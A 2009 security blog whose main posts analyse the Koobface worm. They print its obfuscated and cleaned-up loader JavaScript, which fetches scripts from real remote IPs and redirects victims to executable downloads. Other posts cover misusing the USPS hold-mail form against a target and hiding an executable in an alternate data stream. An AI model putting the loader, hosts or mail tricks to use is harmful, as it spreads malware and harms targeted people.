Friday, December 18, 2009

Free DOS Mail Attack

UPDATE: Well, I searched around to try to find other articles about this, and I came up with a bunch of them. Two of them can be found here: http://msmvps.com/blogs/alunj/archive/2007/06/09/can-t-i-trust-the-postal-service-part-3-the-service.aspx and at Bruce Schneier's blog here: http://www.schneier.com/blog/archives/2006/04/man_diverts_mai.html

The online change of address service is a little better. It charges $1 to a credit card. It says it checks your identity using your payment info, but I'm sure you could get around that with a little social engineering. That idea is even scarier than the one I've written about in this post...

If my wife and I are going to be out of town for any extended period of time, we usually put our mail on hold so it won't be sitting there in our mailbox. We usually do this online at the USPS website. It had been quite a while since I had done this, and it occurred to me just how vulnerable this is to "attack". All the page requires is your name and address. No verification is required to make sure that the person placing the hold request is actually authorized to do so.

Talk about a DOS attack! All you need to know is someone's name and address and the dates you don't want them to receive any mail, and BOOM! you've denied that person any mail. They can pick it up later, though, once they figure out what happened.

I looked into this some more to see if there were any other catches that make it at least a little more secure than I initially thought, but it turns out it's actually worse! This is what the FAQ on Hold Mail says:
  • Do I need to submit multiple Hold Mail requests if there is more than one person at the same address?

    All mail regardless of name will be held for the address entered. Submitting a Hold Mail request once is all that is required to hold mail delivery for everyone at the address.
So, not only do you hold all mail for that one person, you hold all mail for that entire address! It gets better! (also from the same FAQ page):
  • How do I make changes to a previously submitted Hold Mail request?

    To make changes to your original online or telephone Hold Mail request (dates, options, etc.), you will need your confirmation number. If making the change online:
    1. Go to Hold Mail Service and select "Edit or Cancel your HoldMail Request." The system will proceed to the "Customer Information" page.
    2. Select the "Edit your request" radio button and enter your confirmation number, street name/number, city, state, and 5-digit ZIP Code. The confirmation number is not case sensitive.
    3. After you enter the requested information, press the "Continue" button. The system will proceed to the "Edit a Request" page and display your HoldMail Request.
    4. Modify the beginning date, ending date or both to fit your current plans. If your Hold Mail request has started, you can only modify the ending date.
    5. After making updates, scroll to the bottom of the page and press the "Continue" button. Then press "Yes" to verify.
    6. A confirmation page will be displayed to indicate your request has been updated.
    To change an online or telephone Hold Mail request, you may also call us toll free at 1-800-ASK-USPS (1-800-275-8777) to cancel your request. You will need your confirmation number to alter your request by phone.

    If you made your Hold Mail request in person at your local Post Office or you do not have your confirmation number, you will need to go to your local Post Office to make changes to your Hold Mail request.
Wow, what a pain! If you do this, you essentially force them to go into the local Post Office to make any changes, since a confirmation number is needed to change the request online or over the phone.

Crazy stuff! There is also a text box for additional instructions. This is where things could really start to get interesting. You could try to switch people's mail by adding additional instructions to deliver all mail while "we" are gone to "my friend's" address (their neighbors), and then deliver all mail from the neighbor to "his friend's address" (the original target). This would probably confuse the heck out of any mailman (or is mail carrier more correct? Briefträger?), as well as both neighbors.

There are more nefarious deeds that come to mind about this, but I'll leave that up to you to have fun imagining things.

Wednesday, December 16, 2009

To Infinity, and Beyond!

Finally! I've got one more project to finish for my graphics class and then I'll officially be done as an undergraduate at BYU! Now I should have a lot more time to finish writing up all of those blog posts that I stubbed out and never finished (really, there are quite a lot of them). You can expect this blog to be a lot more active now.

I've also been applying around for security-related jobs in fields such as web-application security, network security, malware analysis, CNA/CNE (computer network attack, computer network exploitation), penetration testing, security research, etc. If you happen to know of an opening somewhere, or know of someone else who might know, shoot me an email.

Thursday, October 15, 2009

Feeds I Monitor

Sometimes I want to share the security feeds/blogs I monitor with others, so I usually just give out this link: http://www.bloglines.com/public/nephi-johnson. BUT, Bloglines is really, really slow at opening some of the feeds from that link. So, I've decided to just post all of the feeds and blogs I monitor here:

-atlas wandering-
.:Computer Defense:.
360 Security
ADD / XOR / ROL
Alex's Corner
Amrit Williams Blog
An IT Professional’s Blog
Anachronic
Andrew Martin
Anurag Agarwal - Application Security Evangelist
AppSec Street Fighter - SANS Institute
Billy (BK) Rios
Blog | Security Whole
Boaz Gelbord
Bugtraq
CGISecurity - Website and Application Security News
cktricky and Web Application Security
Command Line Kung Fu
Confessions of a Penetration Tester
Daily Dave
Dancho Danchev's Blog - Mind Streams of Information Security Kno
DarkReading - All Stories
deep inside | security & tools
Denim Group, Ltd.
Digital Soapbox - Preaching Security to the Digital Masses
Disenchant's Blog
Eric's Musings on the Security World
EvilFingers
F-Secure Antivirus Research Weblog
F-Secure Latest 10 Corporate News Rss Feed
FireEye Malware Intelligence Lab
Firewall Wizards
Forage Security
Full Disclosure
gnarlysec
GNUCITIZEN
ha.ckers.org web application security lab
hackademix.net
Hex blog
Honeypots
IDS Focus
In.Security Home
Incidents
Indistinguishable from Jesse
Info Security News
It's a shampoo world anyway
Jack Mannino
Jeremiah Grossman
k3r0s1n3
Laramies Corner
Matasano Chargen
Matt Blaze's Exhaustive Search
McAfee Avert Labs
Michael Howard's Web Log
Minded Security Blog
MS Sec Notification
Network Security Blog
Nibble Security
Nitesh Dhanjani
omg.wtf.bbq.
p42 labs
PaulDotCom
Penetration Testing
PortSwigger.net - web application security
random dross
The RISKS Forum
SANS Internet Storm Center, InfoCON: green
SANS ISC SecNewsFeed
Schneier on Security
SecureWorks Research Blog
Security Bytes
The Security Catalyst
Security Fix
Security Incite Rants
The Security Shoggoth
Security Thoughts
Security to the Core | Arbor Networks Security » 2009
SecurityRecruiter.com's Security Recruiter Blog
Shadowserver Foundation | Information / Whitepapers
Shadowserver Foundation | Main / HomePage
Silver Tail Blog
sirdarckcat
Skeptikal.org
Slashdot
The Spanner
Sunbelt Blog
Suspekt...
Sylvan von Stuppe
Tactical Web Application Security
TaoSecurity
Technicalinfo.net Security
Threat Level
ThreatExpert Blog
ThreatFire Research Blog
TrendLabs | Malware Blog - by Trend Micro
TwitPwn
Vulnerability Development (vuln-dev) Mailing List
Web App Security
Webmonkey
Wired Top Stories
XSSed syndication
Zero Day
Zscaler Research

Enjoy! I'll be keeping this updated as well.

Monday, October 5, 2009

CERT Secure Coding Site Down

(10/5/2009 8:54 AM) EDIT: The site is now up and running

Well, this would be at least a little embarrassing:


At the time of this posting, the entire securecoding.cert.org site seems to be down. Isn't information disclosure part of secure coding? The error message probably isn't a big deal, but still...

This is what cert.org says about information disclosure on their site: actual link, google's cache. A better link: Top 25 Programming Errors (see CWE-209).

Sunday, September 27, 2009

Koobface Javascript Explained

In this post, I'll be going through the javascript files that I've found through links that have been posted on facebook. An example of the original file is shown below:
Javascript
// KROTEG
var pwdfqiyjsclgezbrt9 = [
['facebook.com',  'fb2'],
['tagged.com',    'tg'],
['friendster.com','fr'],
['myspace.com',   'ms'],
['msplinks.com',  'ms'],
['lnk.ms',  'ms'],
['myyearbook.com','yb'],
['fubar.com',     'fu'],
['twitter.com',   'tw'],
['hi5.com',       'hi5'],
['bebo.com',      'be']
];
var fomqnzlcd1 = [
'113.254.53.10',
'90.26.229.142',
'190.172.254.232',
'221.127.37.107',
'59.93.80.251',
'212.27.24.141',
'95.180.84.107',
'80.230.36.229',
'210.6.20.103',
'79.182.37.95',
'219.90.107.78',
'196.217.220.29',
'92.251.109.111',
'96.32.66.105',
'116.197.110.171'];
var sxhidbqvre1 = '', xbujdriqngovtsz3 = '', psgyket3 = '', svzlnruwojfhi7 = '';
var zkglq4 = '' + eval('doc'+sxhidbqvre1+'ume'+xbujdriqngovtsz3+'nt.r'+psgyket3+'efer'+svzlnruwojfhi7+'rer'), ygepvbrakftloqmhwc6 = '';
for (var nilhfdopsrx7 = 0; nilhfdopsrx7 < pwdfqiyjsclgezbrt9.length; nilhfdopsrx7 ++) {
    if ((zkglq4.indexOf(pwdfqiyjsclgezbrt9[nilhfdopsrx7][0]) != -1)) {
  ygepvbrakftloqmhwc6 = '/f=' + pwdfqiyjsclgezbrt9[nilhfdopsrx7][1];
  break;
    }
}
window.redirect = '';
function urocwfkgdsjq6() {
 var higeruoxzcnqsbad9 = '' + window.redirect;
 if (higeruoxzcnqsbad9.length > 0) window.location.href = higeruoxzcnqsbad9;
 else setTimeout('urocwfkgdsjq6()', 50);
}
urocwfkgdsjq6();
var js = '/view';
var n = location.href.indexOf('?id=');
if (n != -1) {
 n = parseInt(location.href.substr(n + 4));
 if (n < 101) js = '/cnet';
 else if (n < 201) js = '/warn';
 else if (n < 301) js = '/scan';
 else if (n < 401) js = '';
}
for (var nilhfdopsrx7 = 0; nilhfdopsrx7 < fomqnzlcd1.length; nilhfdopsrx7 ++) {
 var onjrmgcaifxsqtzb9 = document.createElement('script');
 onjrmgcaifxsqtzb9.type = 'text/javascript';
 onjrmgcaifxsqtzb9.src = 'http://' + fomqnzlcd1[nilhfdopsrx7] + '/go' + '.js' + '?0x3' + 'E8' + ygepvbrakftloqmhwc6 + js + '/' + (location.search.length > 0 ? location.search : '');
 document.getElementsByTagName('head')[0].appendChild(onjrmgcaifxsqtzb9);
}
And here is my version of it (I de-obfuscated most of it):
De-Obfuscated Javascript
// KROTEG
var referrers = [
['facebook.com',  'fb2'],
['tagged.com',    'tg'],
['friendster.com','fr'],
['myspace.com',   'ms'],
['msplinks.com',  'ms'],
['lnk.ms',  'ms'],
['myyearbook.com','yb'],
['fubar.com',     'fu'],
['twitter.com',   'tw'],
['hi5.com',       'hi5'],
['bebo.com',      'be']
];
var ipAddresses = [
'113.254.53.10',
'90.26.229.142',
'190.172.254.232',
'221.127.37.107',
'59.93.80.251',
'212.27.24.141',
'95.180.84.107',
'80.230.36.229',
'210.6.20.103',
'79.182.37.95',
'219.90.107.78',
'196.217.220.29',
'92.251.109.111',
'96.32.66.105',
'116.197.110.171'];
var docReferrer = '' + eval('document.referrer'), newPath = '';
for (var i = 0; i < referrers.length; i ++) {
    if ((docReferrer.indexOf(referrers[i][0]) != -1)) {
  newPath = '/f=' + referrers[i][1];
  break;
    }
}
window.redirect = '';
function WaitForRedirect() {
 var currRedirect = '' + window.redirect;
 if (currRedirect.length > 0) window.location.href = currRedirect;
 else setTimeout('WaitForRedirect()', 50);
}
WaitForRedirect();
var js = '/view';
var n = location.href.indexOf('?id=');
if (n != -1) {
 n = parseInt(location.href.substr(n + 4));
 if (n < 101) js = '/cnet';
 else if (n < 201) js = '/warn';
 else if (n < 301) js = '/scan';
 else if (n < 401) js = '';
}
for (var i = 0; i < ipAddresses.length; i ++) {
 var scriptTag = document.createElement('script');
 scriptTag.type = 'text/javascript';
 scriptTag.src = 'http://' + ipAddresses[i] + '/go.js' + '?0x3' + 'E8' + newPath + js + '/' + (location.search.length > 0 ? location.search : '');
 document.getElementsByTagName('head')[0].appendChild(scriptTag);
}
Ok, now to go through it step by step (I am going to assume you have some experience with javascript).

The first thing this script does is get the referrer here:
Referrer
var docReferrer = '' + eval('document.referrer'), newPath = '';
Then the script tries to find a domain in its referrers array that appears in the docReferrer variable. If it finds one that matches, it sets the newPath variable to /f=<referrer abbreviation>.
Matching the referrer
for (var i = 0; i < referrers.length; i ++) {
    if ((docReferrer.indexOf(referrers[i][0]) != -1)) {
       newPath = '/f=' + referrers[i][1];
       break;
    }
}
The next thing the script does is set window.redirect to "" (window.redirect = '';). Then it defines a function that uses setTimeout() to periodically (and semi-asynchronously) check window.redirect to see if there is any data stored there. If there is, the window.location.href is set to the window.redirect variable, redirecting the browser to the new location. This is shown below:
WaitForRedirect() function
window.redirect = '';
function WaitForRedirect() {
 var currRedirect = '' + window.redirect;
 if (currRedirect.length > 0) window.location.href = currRedirect;
 else setTimeout('WaitForRedirect()', 50);
}
WaitForRedirect();
After making the initial call to the WaitForRedirect() function, the script sets the variable js to one of /view, /cnet, /warn, /scan or blank (''), based on the id number of your account on any one of the social networking sites koobface targets. The way it does this isn't very straightforward. First, it looks for the "?id=" substring in the href:
var n = location.href.indexOf('?id=');
Then, if the current href contains the "?id=" substring, it tries to parse the id of your account from whatever comes after "?id=":
if (n != -1) { n = parseInt(location.href.substr(n + 4)); ... }
Then the script assigns the js variable a new value, depending on the magnitude of your id. If your id is greater than or equal to 401, js will always be "/view". This would be the case for all (I think) facebook accounts, as well as any other account on a site, unless you were one of the first 400 people to sign up and the site uses sequential ids. I'm not quite sure why the script would want to specifically check for this, unless it's because the main site they are targeting uses pages that serve the correct content based on the id url param (hence the ?id=). Still have to figure out more on this one.
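The id-based branching can be boiled down to a small standalone function (same logic as the worm's code, just wrapped up so it's easier to follow and test):

```javascript
// Reproduces the worm's id-to-path logic: pull the number after "?id="
// out of the url and pick a path based on its magnitude. Anything
// >= 401 (or a missing/unparseable id) falls through to '/view'.
function pathForId(href) {
  var js = '/view';
  var n = href.indexOf('?id=');
  if (n != -1) {
    n = parseInt(href.substr(n + 4), 10);
    if (n < 101) js = '/cnet';
    else if (n < 201) js = '/warn';
    else if (n < 301) js = '/scan';
    else if (n < 401) js = '';
  }
  return js;
}

console.log(pathForId('http://example.com/page?id=50'));   // '/cnet'
console.log(pathForId('http://example.com/page?id=350'));  // '' (blank)
console.log(pathForId('http://example.com/page'));         // '/view'
```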

The last thing the script does is append a new script tag to the DOM head for each ip in its ipAddresses array:
New javascript for each ip
for (var i = 0; i < ipAddresses.length; i ++) {
 var scriptTag = document.createElement('script');
 scriptTag.type = 'text/javascript';
 scriptTag.src = 'http://' + ipAddresses[i] + '/go.js' + '?0x3' + 'E8' + newPath + js + '/' + (location.search.length > 0 ? location.search : '');
 document.getElementsByTagName('head')[0].appendChild(scriptTag);
}
This is done in case one of the ips is taken out or stops working. The first script to get loaded assigns the window.redirect variable to a new value. This can be seen in the source of one of the scripts: (At the time of this writing, the ip 113.254.53.10 was up and working)
Second script content
window.redirect='h t t p://113.254.53.10/d='+location.hostname+'/0x3E8/f=fb2/cnet/';
Note that the /f=fb2/cnet/ part of the string being assigned to window.redirect will change based on what site you were on when you clicked the link, as well as what the id= url-param was.

Remember that WaitForRedirect() function we went through earlier and how it periodically checks for a non-blank string in the window.redirect variable? Once the second script assigns a non-blank string to that variable, the WaitForRedirect() function will redirect the browser to the new url. From there, many different things may happen, but it looks like most of them are social networking site look-alikes that try to get you to run an executable that automatically starts downloading.
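The handoff between the two scripts can be simulated outside the browser with a plain object standing in for window (just a sketch of the mechanism, not the worm's actual code; the destination url is made up from the pattern above):

```javascript
// A plain object stands in for the browser's window; the real script
// polls with setTimeout, but calling the check directly shows the
// same handoff between the loader and the second script.
var fakeWindow = { redirect: '', location: { href: '' } };

function checkRedirect() {
  var target = '' + fakeWindow.redirect;
  if (target.length > 0) {
    fakeWindow.location.href = target; // the browser would navigate here
    return true;
  }
  return false; // the real script would setTimeout() and check again
}

checkRedirect(); // first script: redirect is still '', so nothing happens
// ...later, the second script (go.js) fills in the destination:
fakeWindow.redirect = 'http://113.254.53.10/d=example.com/0x3E8/f=fb2/cnet/';
checkRedirect(); // now the "navigation" fires
console.log(fakeWindow.location.href);
```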

Well, that's about it for tonight :)

Koobface on my Facebook II

Well, while I was starting to write up a post describing what the javascript file does, I found another link for koobface on my facebook! This time from a different domain: h t t p ://www.blackjackorchestra.eu/privaledwd/. This link does the exact same thing as the one in the previous post, except for a few differences in their php script quality :), as well as a few other minor changes. In my previous post, I described how the server-side script checked to see if you gave it a valid User-Agent before sending you the javascript in the content. This site does the same thing, but I guess some debug info was left in it! Here's the content that's sent back if you send it a request that does not contain a User-Agent header:
Request & Response (using netcat):
C:\>nc www.blackjackorchestra.eu 80
GET /privaledwd/ HTTP/1.1
HOST: www.blackjackorchestra.eu

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.1.1
X-Powered-By: ASP.NET
Date: Sun, 27 Sep 2009 15:32:28 GMT
Connection: close

<br />
<b>Notice</b>:  Undefined index:  HTTP_USER_AGENT in <b>d:\www\blackjackorchestra.eu\htdocs\privaledwd\index.php</b> on line <b>30</b><br />
<br />
<b>Notice</b>:  Undefined index:  HTTP_USER_AGENT in <b>d:\www\blackjackorchestra.eu\htdocs\privaledwd\index.php</b> on line <b>37</b><br />
<br />
<b>Notice</b>:  Undefined variable: rscript in <b>d:\www\blackjackorchestra.eu\htdocs\privaledwd\index.php</b> on line <b>42</b><br />
<title>Amazing Video</title>
ocwdtreifoyocrb egzcqgtcfx
<img src=afjo4blr.jpg>
ocecaahcqgeuzk qduzqsc
PHP Notice:  Undefined index:  HTTP_USER_AGENT in d:\www\blackjackorchestra.eu\htdocs\privaledwd\index.php on line 30
PHP Notice:  Undefined index:  HTTP_USER_AGENT in d:\www\blackjackorchestra.eu\htdocs\privaledwd\index.php on line 37
PHP Notice:  Undefined variable: rscript in d:\www\blackjackorchestra.eu\htdocs\privaledwd\index.php on line 42
Someone forgot to take out their debug info! Hahaha :) Well, if you do send a valid User-Agent, this is the content that gets sent back:
zzmjqoqvri byiktuysec
<script src="9r.js"></script> 
yadoemvy ilxnsxiilmsnqbb
Also, the javascript file is exactly the same, except for different random names for the variables, and two different ip addresses. The script in the last post had these two addresses: 59.93.80.251, 79.182.37.95. The script in this post doesn't have those two addresses, but has these two instead: 217.132.126.129, 90.17.65.193. Well, I think that covers it for this new koobface url. Now onto writing about that javascript...
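Since the server-side PHP isn't available, here's a hypothetical reconstruction (in JavaScript) of what the User-Agent filter seems to be doing, based on the observed responses. The browser token list is my guess; only the with/without-script behavior is what I actually observed:

```javascript
// Hypothetical sketch of the server-side check: recognized browser
// User-Agents get the malicious script tag, everything else (including
// requests with no User-Agent header at all) gets the decoy page.
function pageFor(userAgent) {
  var ua = userAgent || '';
  var browsers = ['MSIE', 'Firefox', 'Safari', 'Opera', 'Chrome']; // guessed list
  for (var i = 0; i < browsers.length; i++) {
    if (ua.indexOf(browsers[i]) != -1) {
      return '<script src="9r.js"></script>';
    }
  }
  return '<title>Amazing Video</title>\n<img src=afjo4blr.jpg>';
}

console.log(pageFor('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'));
console.log(pageFor('The Old Laundry Basket')); // decoy page, no script tag
```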

Thursday, September 24, 2009

Koobface on my Facebook!

I was checking my facebook earlier today (something I almost never do), and noticed that someone had left a weird link on my wall: h t t p ://s217307881.mialojamiento.es/y0urc1ip/. I first visited the page in Firefox with javascript and such turned off. This is the source of the page as seen from Firefox:
pcnxnkcaiztp cvnxmxxrgscdvkr
<script src="9j72fkj-de1w.js"></script>
qgdtubgfdho adbdzoam
I then decided to visit the page from the command line using netcat:
C:\>nc s217307881.mialojamiento.es 80
GET /y0urc1ip/ HTTP/1.1
Host: s217307881.mialojamiento.es

HTTP/1.1 200 OK
Date: Thu, 24 Sep 2009 18:40:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Transfer-Encoding: chunked
Content-Type: text/html

6e
<title>Amazing Video</title>
ucctsfnqmvyh ldaumylhrlljfb
<img src=j18sda5ncm8.jpg>
exlyansstgifbh wsrwmduxllj

0
Notice the difference? No javascript tag is found in the source. I did a little experimenting with the server and found that only requests that contain valid User-Agent headers will get the script tag:
C:\>nc s217307881.mialojamiento.es 80
GET /y0urc1ip/ HTTP/1.1
Host: s217307881.mialojamiento.es
User-Agent: The Old Laundry Basket

HTTP/1.1 200 OK
Date: Thu, 24 Sep 2009 18:49:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Transfer-Encoding: chunked
Content-Type: text/html

6a
<title>Amazing Video</title>
ozgauyjgghjy aabkqxigumthaux
<img src=j18sda5ncm8.jpg>
jorivrc bjajszitzkdqh

0
This one is sending a User-Agent string that IE8 uses:
C:\Documents and Settings\Student>nc s217307881.mialojamiento.es 80
GET /y0urc1ip/ HTTP/1.1
Host: s217307881.mialojamiento.es
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; .NET CLR 3.0.30729; InfoPath.3; .NET CLR 4.0.20506)

HTTP/1.1 200 OK
Date: Thu, 24 Sep 2009 18:58:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Transfer-Encoding: chunked
Content-Type: text/html

5c
upthmidfi ajglroelpsymijw
<script src="9j72fkj-de1w.js"></script>
ailsoghinur aaqajwmblrnbj

0
Now, onto the Javascript file: 9j72fkj-de1w.js. Below is the original contents of the file:
// KROTEG
var pwdfqiyjsclgezbrt9 = [
['facebook.com',  'fb2'],
['tagged.com',    'tg'],
['friendster.com','fr'],
['myspace.com',   'ms'],
['msplinks.com',  'ms'],
['lnk.ms',  'ms'],
['myyearbook.com','yb'],
['fubar.com',     'fu'],
['twitter.com',   'tw'],
['hi5.com',       'hi5'],
['bebo.com',      'be']
];
var fomqnzlcd1 = [
'113.254.53.10',
'90.26.229.142',
'190.172.254.232',
'221.127.37.107',
'59.93.80.251',
'212.27.24.141',
'95.180.84.107',
'80.230.36.229',
'210.6.20.103',
'79.182.37.95',
'219.90.107.78',
'196.217.220.29',
'92.251.109.111',
'96.32.66.105',
'116.197.110.171'];
var sxhidbqvre1 = '', xbujdriqngovtsz3 = '', psgyket3 = '', svzlnruwojfhi7 = '';
var zkglq4 = '' + eval('doc'+sxhidbqvre1+'ume'+xbujdriqngovtsz3+'nt.r'+psgyket3+'efer'+svzlnruwojfhi7+'rer'), ygepvbrakftloqmhwc6 = '';
for (var nilhfdopsrx7 = 0; nilhfdopsrx7 < pwdfqiyjsclgezbrt9.length; nilhfdopsrx7 ++) {
    if ((zkglq4.indexOf(pwdfqiyjsclgezbrt9[nilhfdopsrx7][0]) != -1)) {
  ygepvbrakftloqmhwc6 = '/f=' + pwdfqiyjsclgezbrt9[nilhfdopsrx7][1];
  break;
    }
}
window.redirect = '';
function urocwfkgdsjq6() {
 var higeruoxzcnqsbad9 = '' + window.redirect;
 if (higeruoxzcnqsbad9.length > 0) window.location.href = higeruoxzcnqsbad9;
 else setTimeout('urocwfkgdsjq6()', 50);
}
urocwfkgdsjq6();
var js = '/view';
var n = location.href.indexOf('?id=');
if (n != -1) {
 n = parseInt(location.href.substr(n + 4));
 if (n < 101) js = '/cnet';
 else if (n < 201) js = '/warn';
 else if (n < 301) js = '/scan';
 else if (n < 401) js = '';
}
for (var nilhfdopsrx7 = 0; nilhfdopsrx7 < fomqnzlcd1.length; nilhfdopsrx7 ++) {
 var onjrmgcaifxsqtzb9 = document.createElement('script');
 onjrmgcaifxsqtzb9.type = 'text/javascript';
 onjrmgcaifxsqtzb9.src = 'http://' + fomqnzlcd1[nilhfdopsrx7] + '/go' + '.js' + '?0x3' + 'E8' + ygepvbrakftloqmhwc6 + js + '/' + (location.search.length > 0 ? location.search : '');
 document.getElementsByTagName('head')[0].appendChild(onjrmgcaifxsqtzb9);
}
And here is my version of it:
// KROTEG
var referrers = [
['facebook.com',  'fb2'],
['tagged.com',    'tg'],
['friendster.com','fr'],
['myspace.com',   'ms'],
['msplinks.com',  'ms'],
['lnk.ms',  'ms'],
['myyearbook.com','yb'],
['fubar.com',     'fu'],
['twitter.com',   'tw'],
['hi5.com',       'hi5'],
['bebo.com',      'be']
];
var ipAddresses = [
'113.254.53.10',
'90.26.229.142',
'190.172.254.232',
'221.127.37.107',
'59.93.80.251',
'212.27.24.141',
'95.180.84.107',
'80.230.36.229',
'210.6.20.103',
'79.182.37.95',
'219.90.107.78',
'196.217.220.29',
'92.251.109.111',
'96.32.66.105',
'116.197.110.171'];
var docReferrer = '' + eval('document.referrer'), newPath = '';
for (var i = 0; i < referrers.length; i ++) {
    if ((docReferrer.indexOf(referrers[i][0]) != -1)) {
  newPath = '/f=' + referrers[i][1];
  break;
    }
}
window.redirect = '';
function WaitForRedirect() {
 var currRedirect = '' + window.redirect;
 if (currRedirect.length > 0) window.location.href = currRedirect;
 else setTimeout('WaitForRedirect()', 50);
}
WaitForRedirect();
var js = '/view';
var n = location.href.indexOf('?id=');
if (n != -1) {
 n = parseInt(location.href.substr(n + 4));
 if (n < 101) js = '/cnet';
 else if (n < 201) js = '/warn';
 else if (n < 301) js = '/scan';
 else if (n < 401) js = '';
}
for (var i = 0; i < ipAddresses.length; i ++) {
 var scriptTag = document.createElement('script');
 scriptTag.type = 'text/javascript';
 scriptTag.src = 'http://' + ipAddresses[i] + '/go.js' + '?0x3' + 'E8' + newPath + js + '/' + (location.search.length > 0 ? location.search : '');
 document.getElementsByTagName('head')[0].appendChild(scriptTag);
}
I did some searching around for the word "KROTEG" and found this link: http://r3v3rs3e.wordpress.com/tag/kroteg/. What was on my wall was just another variant of the koobface worm.

I must say, though, I found the javascript obfuscation quite simple to undo, which I did not expect from something that receives so much press.
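Essentially, the whole obfuscation scheme comes down to one trick: splice a string like 'document.referrer' together from fragments (with always-empty padding variables in between) and eval it, so the sensitive property name never appears literally in the source:

```javascript
// The padding variables are always '', so the concatenation just
// rebuilds the property-access string, which the worm then evals.
var pad1 = '', pad2 = '';
var expr = 'doc' + pad1 + 'ument.ref' + pad2 + 'errer';
console.log(expr); // 'document.referrer'
// In the browser the script then does: var ref = '' + eval(expr);
```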

I don't have time now to explain what the js file does, but will go through that in another post.

Sunday, September 20, 2009

W3 Simple Proxy/Anonymizer with Custom User-Agent

A while ago I decided to hit the XHTML Validate link to see what the W3 XHTML Validator said was wrong with a web page. Of course, there were tons of things wrong (I don't know why people ever put the link on their pages, because the pages are never compliant with the w3 standards). Anyways, I noticed that it gives you the option to view the source code of the page it's supposed to be validating, and realized you could use this as a proxy to view html web pages. Also, the w3 validator gives you the option of specifying the user-agent header that will be sent to the server, which could come in handy. They also seem to have a mechanism in place to keep you from inserting additional headers into the HTTP request sent to the server, although the mechanisms for the uri param and the user-agent param are different.

Here's a sample url http://translate.google.com/translate?hl=en&sl=es&tl=en&u=http://validator.w3.org/check%3Furi%3Dhttp://gnarlysec.blogspot.com%26charset%3D(detect%2Bautomatically)%26doctype%3DInline%26ss%3D1%26group%3D0%26user-agent%3DW3C_Validator/1.654. The source at the bottom of the page would still need to be parsed out, but that's the basic idea. Also note the url param "user-agent".
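The url construction is the only tricky part: the validator url (query string and all) has to be percent-encoded before it's handed to the translate service as the u param. Here's a sketch in JavaScript; encodeURIComponent encodes a bit more than the sample url above (e.g. the slashes), but the result works the same way, and the extra params in the sample are dropped here for brevity:

```javascript
// Builds the nested proxy url: target page -> W3 validator (with a
// chosen user-agent) -> Google Translate. Parameter names are taken
// from the sample url in the post.
function proxyUrl(target, userAgent) {
  var validator = 'http://validator.w3.org/check?uri=' + target +
                  '&ss=1&user-agent=' + userAgent;
  return 'http://translate.google.com/translate?hl=en&sl=es&tl=en&u=' +
         encodeURIComponent(validator);
}

console.log(proxyUrl('http://gnarlysec.blogspot.com', 'W3C_Validator/1.654'));
```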

Monday, August 17, 2009

Local Proxies with IE and Chrome

As I do web development, I often find it easier to set up a local proxy using Paros or Burp to more easily manipulate values being sent to the server. I usually use Firefox as my main web browser, and consequently almost exclusively configure Firefox to use the local proxy. The other day, I didn't feel like using Firefox, so I used IE instead and told it to use the local proxy I had set up with Burp. At the time, I also had Google Chrome running.

Everything went well for requests I had made using IE. Burp captured all requests and responses that were sent. Then I noticed another request/response that I didn't trigger through IE:
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: www.download.windowsupdate.com
Proxy-Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache



HTTP/1.1 200 OK
Content-Length: 18
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "0e4bf26aecac91:803b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 9261
Date: Mon, 17 Aug 2009 13:00:35 GMT
Last-Modified: Fri, 01 May 2009 22:42:48 GMT
Connection: keep-alive

1401C9CAAE2685483A
I'm not sure yet if it's IE sending this request, or some other program/service that is looking for windows updates.

I did notice, however, that all requests/responses sent through Google Chrome also get captured by the local proxy I had set up for IE with Burp. Not only do all Chrome requests get captured, but so do all http requests sent by all Visual Studio Express products (probably Visual Studio as well). I'm sure there are tons of other requests that would be captured by doing this.

Saturday, August 15, 2009

Alternate Data Streams

In my recent Operating Systems class, I was supposed to give a 15-minute presentation about the Windows file system. Instead of talking only about that, I got permission to talk about alternate data streams. This is my presentation (yes, somewhat brief, but I think it still gives a good description of why/how alternate data streams work).

A good part of my presentation was doing live demonstrations of how alternate data streams can be used from the command line. Here are some examples:
C:\ads>echo >stream.txt default unnamed data stream

C:\ads>dir
 Volume in drive C is BLAH
 Volume Serial Number is 48C7-9ED4

 Directory of C:\ads

08/15/2009  07:37 AM    <DIR>          .
08/15/2009  07:37 AM    <DIR>          ..
08/15/2009  07:37 AM                30 stream.txt
               1 File(s)             30 bytes
               2 Dir(s)  17,025,347,584 bytes free

C:\ads>more < stream.txt
 default unnamed data stream

C:\ads>echo >stream.txt:ads alternate (named) data stream

C:\ads>dir
 Volume in drive C is BLAH
 Volume Serial Number is 48C7-9ED4

 Directory of C:\ads

08/15/2009  07:37 AM    <DIR>          .
08/15/2009  07:37 AM    <DIR>          ..
08/15/2009  07:38 AM                30 stream.txt
               1 File(s)             30 bytes
               2 Dir(s)  17,025,347,584 bytes free

C:\ads>more < stream.txt:ads
 alternate (named) data stream

C:\ads>type C:\WINDOWS\notepad.exe > stream.txt:other_notepad.exe

C:\ads>start C:\ads\stream.txt:other_notepad.exe

C:\ads>cd ..

C:\>echo >ads:folder_data_stream folders can have named data streams as well

C:\>more <ads:folder_data_stream
 folders can have named data streams as well

C:\>dir ads
 Volume in drive C is BLAH
 Volume Serial Number is 48C7-9ED4

 Directory of C:\ads

08/15/2009  07:39 AM    <DIR>          .
08/15/2009  07:39 AM    <DIR>          ..
08/15/2009  07:38 AM                30 stream.txt
               1 File(s)             30 bytes
               2 Dir(s)  17,024,843,776 bytes free

C:\>dir /a:d ad?
 Volume in drive C is BLAH
 Volume Serial Number is 48C7-9ED4

 Directory of C:\

08/15/2009  07:39 AM    <DIR>          ads
               0 File(s)              0 bytes
               1 Dir(s)  17,024,843,776 bytes free

C:\>

Reverse DNS Lookups from the Command Line

